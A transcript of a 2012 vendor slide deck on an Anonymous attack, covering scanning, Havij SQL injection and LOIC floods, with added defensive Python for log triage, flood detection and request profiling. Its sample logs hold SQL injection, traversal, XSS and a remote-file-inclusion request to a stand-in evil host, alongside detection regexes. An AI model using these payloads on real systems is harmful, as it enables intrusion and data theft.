The Anatomy and Security of an Anonymous Operation


1 The Anatomy and Security of an Anonymous Operation
July 2012. Terry Ray, VP WW Security Engineering

2 What is Anonymous? Perception vs. Reality
Perception: “[Anonymous is] the first Internet-based superconsciousness.” —Chris Landers, Baltimore City Paper, April 2, 2008. Hacktivists fighting for moral causes. The 99%.
Reality: “Anonymous is an umbrella for anyone to hack anything for any reason.” —New York Times, 27 Feb 2012. Targets include porn sites, Mexican drug lords, Sony, government agencies, banks, churches, law enforcement and Vladimir Putin. Anyone can be a target.

3 The Plot
The attack took place in 2011 over a 25-day period. Anonymous was on a deadline to breach and disrupt a website: a proactive attempt at hacktivism. 10 to 15 skilled hackers, backed by several hundred to thousands of supporters.

4 How They Attack: The Anonymous Attack Anatomy

5 Anonymous Attack on Customer Site: Web Application Protection Use Case
[Slide diagram, titled "SecureSphere Web Application Firewall Presentation: Anonymous Attack on Customer Site, Web Application Protection Use Case", dated May 21, 2007. Phase I: technical attack, scanners such as Nikto. Phase II: technical attack, Havij SQL injection tool. Phase III: business-logic attack, LOIC application. Caption: SecureSphere stopped all phases of the attack.]
Speaker notes: The first use case we are going to look at is Web application protection, and since it is an important use case we are going to examine different Web application threats and how SecureSphere mitigated them. The first one is a multinational company that was attacked by the hacktivist group Anonymous. Imperva witnessed the assault, which occurred over a period of 25 days. It started with recruiting activities and application probes by scanners such as Nikto and Acunetix; these scans tried to uncover Web vulnerabilities. During the second phase, Anonymous turned to attack tools like the Havij SQL injection tool to attempt to hack the site. They also used anonymity services like anonymous proxies to disguise their identity. During both of these phases, Imperva blocked all attacks. When the technical attacks failed, Anonymous turned to DDoS attacks to attempt to bring down the website. They used LOIC, the Low Orbit Ion Cannon, and a new mobile version of the tool to disrupt application access. Traffic spiked, but SecureSphere was able to mitigate this Web-based DDoS attack.

6 On the Offense
Skilled hackers: this group, around 10 to 15 individuals per campaign, has genuine hacking experience and is quite savvy. Broad use of anonymizing services (anonymous proxies and Tor).
Nontechnical: this group can be quite large, ranging from a few dozen to a few hundred volunteers. Directed by the skilled hackers, their role is primarily to conduct DDoS attacks, either by downloading and running special software or by visiting websites designed to flood victims with excessive traffic.

7 On the Defense
Deployment line: network firewall, IDS, WAF, web servers, network anti-DoS and anti-virus.
Imperva SecureSphere WAF version 8.5, inline, high availability, with ThreatRadar reputation (IP reputation).
SSL wasn't used; the whole website was served over plain HTTP.

8 Part 1: Recruiting and Communications

9 Step 1A: An “Inspirational” Video

10 Step 1B: Social Media Helps Recruit

11 Setting Up An Early Warning System

12 Example

13 Part 2: Recon and Application Attack
“Avoid strength, attack weakness: Striking where the enemy is most vulnerable.” —Sun Tzu

14 Step 1A: Finding Vulnerabilities
Tool #1: vulnerability scanners. Purpose: rapidly find application vulnerabilities. Cost: $0 to $1,000 per license. The specific tools: Acunetix (named a “Visionary” in a Gartner 2011 Magic Quadrant) and Nikto (open source).

15 Hacking Tools
Tool #2: Havij. Purpose: automated SQL injection and data-harvesting tool, developed solely to take data transacted by applications. Developed in Iran.

16 Vulnerabilities of Interest
Directory traversal (DT), SQL injection (SQLi) and cross-site scripting (XSS).

17 Comparing to Lulzsec Activity
Lulzsec was (and perhaps still is) a team of hackers focused on breaking applications and databases. A 'new' Lulzsec has been taking credit for recent attacks, e.g. Militarysingles.com. Our observations have a striking similarity to the attacks employed by Lulzsec during their campaign. Lulzsec used SQL injection, cross-site scripting and remote/local file inclusion (RFI/LFI). [Figure: RFI attempt against index.php]

18 Lulzsec Activity Samples
1 infected server ≈ the power of 3,000 bot-infected PCs. 8,000 infected servers ≈ the power of 24 million bot-infected PCs.

19 Automation is Prevailing
In one hacker forum, it was boasted that one hacker had found 5,012 websites vulnerable to SQLi through automation tools. Due to automation, hackers can be effective in small groups (e.g. Lulzsec). Automation also means that attacks are equal-opportunity offenders: they don't discriminate between well-known and unknown sites.
Speaker notes: Most notably, the ADC (Imperva's Application Defense Center) found that attack automation is prevailing. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute-force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. As the recent Lulzsec episode highlighted, hackers can be effective in small groups. Further, automation means attacks do not discriminate between well-known and unknown sites, or between enterprise-level and non-profit organizations. According to the study, websites experience an average of 27 attacks per hour, or about one every two minutes. However, 27 attacks per hour is only an average: when a site comes under automated attack, the target can experience up to 25,000 attacks per hour, or 7 per second.

20 The US is the ‘visible’ source of most attacks
Speaker notes: Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses. For all attack types the attackers were spread around the world, but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) came from the United States. A significant portion of the SQL injection attacks we observed came from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT.
During the Anonymous attack, 74% of the technical attack traffic originated from anonymizing services and was detected by IP reputation.
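The recon and application-attack phase on slides 14 through 20 comes down to three things a defender can see in web-server logs: scanner and tool user-agents (Nikto, Acunetix, Havij), payloads for the vulnerability classes of interest (DT, SQLi, XSS, RFI), and the source statistics the deck quotes (share of events from the most active sources, attacks per attacking host, share of traffic from anonymizing services). The following is an added example, not code from the deck or from Imperva: it tags constructed access-log lines with a small signature set and computes those statistics. The log lines, user-agent strings and the reputation dictionary standing in for a feed such as ThreatRadar are all constructed for illustration.

```python
"""Added example: signature triage of web access-log lines plus per-source
statistics. Log lines, user-agents and the reputation list are constructed."""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed Combined Log Format lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.10 - - [12/Aug/2011:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Aug/2011:10:01:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 0 "-" "Mozilla/5.00 (Nikto/2.1.4)"
203.0.113.10 - - [12/Aug/2011:10:01:04 +0000] "GET /admin/ HTTP/1.1" 404 0 "-" "Mozilla/5.00 (Nikto/2.1.4)"
198.51.100.7 - - [12/Aug/2011:10:02:10 +0000] "GET /index.php?id=1%27%20AND%201=1-- HTTP/1.1" 200 480 "-" "Havij"
198.51.100.7 - - [12/Aug/2011:10:02:11 +0000] "GET /index.php?id=1%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 500 0 "-" "Havij"
198.51.100.7 - - [12/Aug/2011:10:02:12 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 403 0 "-" "Havij"
192.0.2.55 - - [12/Aug/2011:10:03:00 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.0.2.55 - - [12/Aug/2011:10:03:05 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.0.2.99 - - [12/Aug/2011:10:04:00 +0000] "GET /about.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Nikto, Acunetix and Havij announce themselves in the User-Agent by default.
# A careful attacker changes it, so treat this as a weak signal.
SCANNER_UA = re.compile(r"nikto|acunetix|havij", re.I)

# Coarse payload signatures, matched against the URL-decoded request path.
SIGNATURES = [
    ("SQLi", re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+|union\s+select|\bsleep\s*\(", re.I)),
    ("DT",   re.compile(r"\.\.[/\\]|/etc/passwd|boot\.ini", re.I)),
    ("XSS",  re.compile(r"<\s*script|javascript:|on(error|load)\s*=", re.I)),
    ("RFI",  re.compile(r"[?&]\w+=(https?|ftp)://", re.I)),
]

# Constructed reputation feed (source IP -> category); a stand-in for ThreatRadar.
REPUTATION = {"198.51.100.7": "anonymous-proxy", "192.0.2.55": "tor-exit"}


def classify(path, user_agent):
    """Tags for one request: 'scanner:<tool>' if the UA is a known tool,
    plus one tag per attack signature that matches the decoded path."""
    tags = []
    m = SCANNER_UA.search(user_agent)
    if m:
        tags.append("scanner:" + m.group(0).lower())
    decoded = unquote(path)
    for name, rx in SIGNATURES:
        if rx.search(decoded):
            tags.append(name)
    return tags


def parse(log_text):
    """Parse log lines and keep only those that carry at least one tag."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["path"], m["ua"])
        if tags:
            events.append({"ip": m["ip"], "path": m["path"], "tags": tags})
    return events


def summarise(events, reputation, top_n=10):
    """Per-source counts, share of events from the top_n sources, attacks per
    attacking host per attack type, and share of events from listed sources."""
    by_ip = Counter(e["ip"] for e in events)
    type_events, type_hosts = Counter(), defaultdict(set)
    for e in events:
        for t in e["tags"]:
            if t.startswith("scanner:"):
                continue
            type_events[t] += 1
            type_hosts[t].add(e["ip"])
    total = len(events) or 1
    top_share = sum(c for _, c in by_ip.most_common(top_n)) / total
    flagged = {ip: reputation[ip] for ip in by_ip if ip in reputation}
    anon_share = sum(by_ip[ip] for ip in flagged) / total
    return {
        "by_ip": dict(by_ip),
        "ratio": {t: type_events[t] / len(type_hosts[t]) for t in type_events},
        "top_share": top_share,
        "flagged": flagged,
        "anon_share": anon_share,
    }


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    for e in ev:
        print(e["ip"], e["tags"], e["path"])
    print(summarise(ev, REPUTATION))
```

On the constructed sample, the Havij source accounts for both SQLi events (an attacks-per-host ratio of 2.0 for SQLi), and five of the seven tagged events come from the two sources on the reputation list, which is the same kind of figure as the deck's 74%. Signatures this coarse are a triage aid, not a control: they miss encoded or obfuscated payloads and fire on legitimate parameters that happen to contain `union select`, which is why the deck pairs signatures with a learned application profile and IP reputation.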

21 Stop Automated Attacks
Mitigation ladder, from basic to mature: AppSec 101 (code fixing); dork yourself (run the same search-engine queries attackers use to find exposed pages and vulnerabilities on your own site); blacklist + IP reputation; WAF; WAF + VA (vulnerability assessment integration).

22 Part 3: Application DDoS

23 LOIC Facts
Low Orbit Ion Cannon (LOIC). Purpose: DDoS. Mobile and JavaScript variations exist; other variations include HOIC, GOIC and RefRef. LOIC downloads: 2011: 381,976. 2012 (through May 10): 374,340, i.e. by June 2012 already ~98% of 2011's total.

24 Anonymous and LOIC in Action
[Chart: transactions per second, LOIC in action versus average site traffic]

25 Application DDoS
“The effectiveness of RefRef is due to the fact that it exploits a vulnerability in a widespread SQL service. The flaw is apparently known but not widely patched yet. The tool's creators don't expect their attacks to work on a high-profile target more than a couple of times before being blocked, but they don't believe organizations will rush to patch this flaw en masse before being hit.” —The Hacker News, July 30, 2011

26 But That Much Sophistication Isn’t Always Required

27 But That Much Sophistication Isn’t Always Required (continued)
[Screenshot of a web-based attack page prompting: “Meet your target URL”]
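Slides 23 through 27 describe the LOIC phase: nothing clever, just many volunteers sending as many requests as they can to one URL, with a JavaScript page variant that needs no download at all. On the chart in slide 24 this shows up as transactions per second jumping far above the site's average. The following is an added example, not code from the deck or from Imperva, of the simplest detection that turns that chart into an action: learn the site's baseline rate, block any single source that exceeds a per-window request limit, and raise a site-wide surge alert when the total rate exceeds a multiple of baseline. The traffic generator, the address ranges and the thresholds are constructed for illustration.

```python
"""Added example: sliding-window rate detection for a LOIC-style HTTP flood.
Traffic is constructed; thresholds are illustrative."""
import random
from collections import defaultdict, deque


def generate_traffic(seed=1):
    """Constructed traffic as sorted (timestamp, source_ip, path) tuples.
    Baseline: 20 visitors at ~0.2 req/s each for 60 s (about 4 TPS in total).
    Flood: from t=30 to t=40, 40 sources each send 30 req/s to '/'."""
    rng = random.Random(seed)
    reqs = []
    for i in range(20):
        t = rng.uniform(0, 5)
        while t < 60:
            reqs.append((t, f"192.0.2.{i + 1}", "/"))
            t += rng.expovariate(0.2)
    for i in range(40):
        for k in range(300):
            reqs.append((30 + k / 30 + rng.uniform(0, 0.01), f"203.0.113.{i + 1}", "/"))
    reqs.sort()
    return reqs


def detect_flood(requests, window_s=1.0, per_ip_limit=20, surge_factor=10.0, learn_s=20.0):
    """Learn the baseline TPS from the first learn_s seconds, then
    (a) block any source exceeding per_ip_limit requests per window_s sliding
    window and (b) record when the site-wide rate first exceeds
    surge_factor x baseline. Requests must be sorted by time."""
    per_ip = defaultdict(deque)
    site = deque()
    blocked, blocked_at = set(), {}
    learn_count, baseline_tps, surge_at = 0, None, None
    for t, ip, _path in requests:
        if t < learn_s:
            learn_count += 1
            continue
        if baseline_tps is None:
            baseline_tps = max(learn_count / learn_s, 1.0)
        q = per_ip[ip]
        q.append(t)
        while q[0] < t - window_s:      # drop requests outside the window
            q.popleft()
        if len(q) > per_ip_limit and ip not in blocked:
            blocked.add(ip)
            blocked_at[ip] = t
        site.append(t)
        while site[0] < t - window_s:
            site.popleft()
        if surge_at is None and len(site) / window_s > surge_factor * baseline_tps:
            surge_at = t
    return {"baseline_tps": baseline_tps, "blocked": blocked,
            "blocked_at": blocked_at, "surge_at": surge_at}


if __name__ == "__main__":
    result = detect_flood(generate_traffic())
    print(f"baseline {result['baseline_tps']:.1f} TPS, surge at t={result['surge_at']:.2f}s, "
          f"{len(result['blocked'])} sources blocked")
```

With these numbers every flooding source is blocked within its first second and the surge alert fires within milliseconds of the flood starting, while no regular visitor is touched. Two caveats a practitioner would add: the per-source limit is only useful when the flood is made of a manageable number of sources, as it was here (a few hundred volunteers rather than a botnet), and a site-wide surge alert needs a response that is not simply "drop everything", such as challenging clients or prioritising known-good sessions, or the DDoS has succeeded anyway.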

28 Part 4: Non-Mitigations

29 I have IPS and NGFW, am I safe?
IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware” marketing with Web application security. At a minimum, a WAF must include the following to protect web applications: web-app profile; web-app signatures; web-app protocol security; web-app DDoS security; web-app cookie protection; anonymous proxy/Tor IP security; HTTPS (SSL) visibility; security policy correlation.

30 I have IPS and NGFW, am I safe? (continued)
The same list, with the items that IPS and NGFWs at best only partially support highlighted in red; the highlighting is not preserved in this transcript.
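The first item on the checklist above, the web-app profile, is what separates a WAF from signature-only devices: instead of listing known-bad strings, it learns what legitimate requests to each URL look like and rejects anything else, so a payload that no signature names still fails the profile. The following is an added example, not code from the deck or from SecureSphere, of a toy positive-security profile. It learns, per method and path, which parameters exist, the loosest character class their values use and how long they get, then reports deviations. The training requests, the test requests and the character classes are constructed for illustration; a real profile also covers cookies, methods, content types and dynamic URLs.

```python
"""Added example: a toy positive-security web application profile.
Clean traffic and test requests are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Value classes from strictest to loosest; a learned parameter is widened to
# the loosest class seen in clean traffic. Anything else is 'any'.
CLASSES = [
    ("digits", re.compile(r"^\d+$")),
    ("alnum", re.compile(r"^[A-Za-z0-9_\-]+$")),
    ("text", re.compile(r"^[A-Za-z0-9_\-\s.,@]+$")),
]
RANK = {"digits": 0, "alnum": 1, "text": 2, "any": 3}


def value_class(value):
    for name, rx in CLASSES:
        if rx.match(value):
            return name
    return "any"


class Profile:
    def __init__(self):
        # (method, path) -> {param: {"class": str, "maxlen": int}}
        self.urls = defaultdict(dict)

    @staticmethod
    def _split(url):
        parts = urlsplit(url)
        # parse_qsl URL-decodes values, so the profile sees what the app sees
        return parts.path, parse_qsl(parts.query, keep_blank_values=True)

    def learn(self, method, url):
        """Widen the profile with one request known to be legitimate."""
        path, params = self._split(url)
        spec = self.urls[(method, path)]
        for name, value in params:
            entry = spec.setdefault(name, {"class": "digits", "maxlen": 0})
            cls = value_class(value)
            if RANK[cls] > RANK[entry["class"]]:
                entry["class"] = cls
            entry["maxlen"] = max(entry["maxlen"], len(value))

    def check(self, method, url, slack=1.5):
        """Return the list of profile violations for a request (empty = allowed)."""
        path, params = self._split(url)
        if (method, path) not in self.urls:
            return ["unknown-url"]
        spec = self.urls[(method, path)]
        violations = []
        for name, value in params:
            if name not in spec:
                violations.append(f"unknown-param:{name}")
                continue
            if RANK[value_class(value)] > RANK[spec[name]["class"]]:
                violations.append(f"class:{name}")
            # allow some growth over the longest clean value, with a small floor
            if len(value) > max(spec[name]["maxlen"] * slack, 4):
                violations.append(f"length:{name}")
        return violations


def build_demo_profile():
    """Profile learned from constructed clean traffic for a two-page site."""
    p = Profile()
    for url in ["/index.php?id=1", "/index.php?id=42", "/index.php?id=17",
                "/search?q=blue+widgets", "/search?q=shoes"]:
        p.learn("GET", url)
    return p


if __name__ == "__main__":
    p = build_demo_profile()
    for url in ["/index.php?id=42",
                "/index.php?id=1%27%20AND%201=1--",
                "/index.php?page=../../etc/passwd",
                "/search?q=%3Cscript%3Ealert(1)%3C/script%3E",
                "/admin/"]:
        print(url, "->", p.check("GET", url) or "allowed")
```

Note what the profile catches without any attack knowledge: the `page` parameter used for traversal is rejected because the learned `/index.php` has no such parameter, and the SQL and script payloads are rejected because `id` was only ever numeric and `q` never contained `<`, `'` or parentheses. The cost is the learning period: the profile must be built from traffic known to be clean (the recruiting-phase warning on slide 11 is exactly the time to freeze it), and an application change invalidates it, which is why products pair profiling with a learning mode and with signatures rather than replacing them.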

31 Recent attacker targets
Yahoo Voice, LinkedIn, Last.fm, Formspring, eHarmony, US Department of Justice, US Copyright Office, FBI, MPAA, Warner Brothers, RIAA, HADOPI, BMI, SOHH, Office of the AU Prime Minister, AU House of Parliament, AU Department of Communications, Swiss bank PostFinance, Egyptian Government, Itau, Banco de Brazil, US Senate, Caixa, Church of Scientology, Muslim Brotherhood, Zappos.com, MilitarySingles.com, Amazon, Austria Federal Chancellor, HBGary Federal, Mexican Interior Ministry, Mexican Senate, Mexican Chamber of Deputies, Irish Department of Justice, Irish Department of Finance, Greek Department of Justice, Egyptian National Democratic Party, Spanish Police, Orlando Chamber of Commerce, Catholic Diocese of Orlando, Bay Area Rapid Transit, PayPal, Mastercard, Visa.
How many of these organizations have AV, IPS and Next Generation Firewalls? Why are the attacks successful when these technologies claim to prevent them?

32 Part 5: Demo

